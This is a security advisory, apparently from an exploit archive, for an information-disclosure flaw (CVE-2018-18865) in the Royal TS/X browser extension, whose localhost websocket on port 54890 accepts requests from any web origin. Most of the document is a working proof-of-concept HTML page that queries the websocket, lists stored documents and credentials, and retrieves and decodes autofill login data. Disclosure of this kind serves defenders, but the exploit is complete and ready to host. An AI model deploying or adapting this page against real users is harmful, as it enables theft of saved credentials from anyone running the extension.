Royal TSX Information Disclosure Vulnerability

2018-11-07
ID: 100111
CVE: None
Download vulnerable application: None
Title: Royal TS/X - Information Disclosure
Author: Jakub Palaczynski
CVE: CVE-2018-18865
 Affected product:
=============
 Royal TS/X < Royal TS v5 Beta / Royal TSX v4 Beta
  Vulnerability - Information Disclosure:
=============================
 Any third party web application can steal credentials created in Royal TS/X
when browser extension is enabled.
Browser extension communicates using websockets (default TCP port 54890)
and websockets do not use any validation to verify origin of the request.
  PoC website:
==========
   <!DOCTYPE html>
  <meta charset="utf-8" />
  <title>RoyalTS/X Exploit</title>
  <script language="javascript" type="text/javascript">
   var wsUri = "ws://127.0.0.1:54890/";
  var output;
   function init()
  {
    output = document.getElementById("output");
    testWebSocket();
  }
   function testWebSocket()
  {
writeToScreen("Let's retrieve some data...");
    websocket = new WebSocket(wsUri);
    websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetDocuments\",\"Arguments\":null,\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
    websocket.onclose = function(evt) { onClose(evt) };
    websocket.onmessage = function(evt) { onMessage(evt) };
    websocket.onerror = function(evt) { onError(evt) };
  }
   function onOpen(evt,message)
  {
    doSend(message);
  }
   function onClose(evt)
  {
  }
   function onMessage(evt)
  {
var obj = JSON.parse(evt.data);
if (obj['Command'] == "GetDocuments") {
for (var x in obj['ResponseData']){
writeToScreen("Name: " + obj['ResponseData'][x]['Name']);
writeToScreen("Unlocked: " + obj['ResponseData'][x]['Unlocked']);
for (var y in obj['ResponseData'][x]['Credentials']){
writeToScreen("Username: " +
obj['ResponseData'][x]['Credentials'][y]['UserName']);
writeToScreen("URL: " + obj['ResponseData'][x]['Credentials'][y]['URL']);
if (obj['ResponseData'][x]['Unlocked'] == true){
websocket.close();
websocket = new WebSocket(wsUri);
websocket.onopen = function(evt) {
onOpen(evt,"{\"Command\":\"GetLoginInformation\",\"Arguments\":{\"CredentialId\":\""
+ obj['ResponseData'][x]['Credentials'][y]['ID'] +
"\"},\"PluginVersion\":\"1.0.0.0\",\"RequestId\":\"aaaaaaaa-aaaa-aaaa-aaaa-aaaaaaaaaaaa\"}")
};
websocket.onclose = function(evt) { onClose(evt) };
websocket.onmessage = function(evt) { onMessage(evt) };
websocket.onerror = function(evt) { onError(evt) };
}
}
}
}
else {
if (obj['Command'] == "GetLoginInformation") {
var obj = JSON.parse(evt.data);
writeToScreen("AutoFill Data: " + atob(obj['ResponseData']));
}
}
  }
   function onError(evt)
  {
    writeToScreen('<span style="color: red;">ERROR:</span> ' + evt.data);
  }
   function doSend(message)
  {
    websocket.send(message);
  }
   function writeToScreen(message)
  {
    var pre = document.createElement("p");
    pre.style.wordWrap = "break-word";
    pre.innerHTML = message;
    output.appendChild(pre);
  }
   window.addEventListener("load", init, false);
   </script>
   <h2>RoyalTS/X Exploit</h2>
   <div id="output"></div>
1.1.11-prod (www01)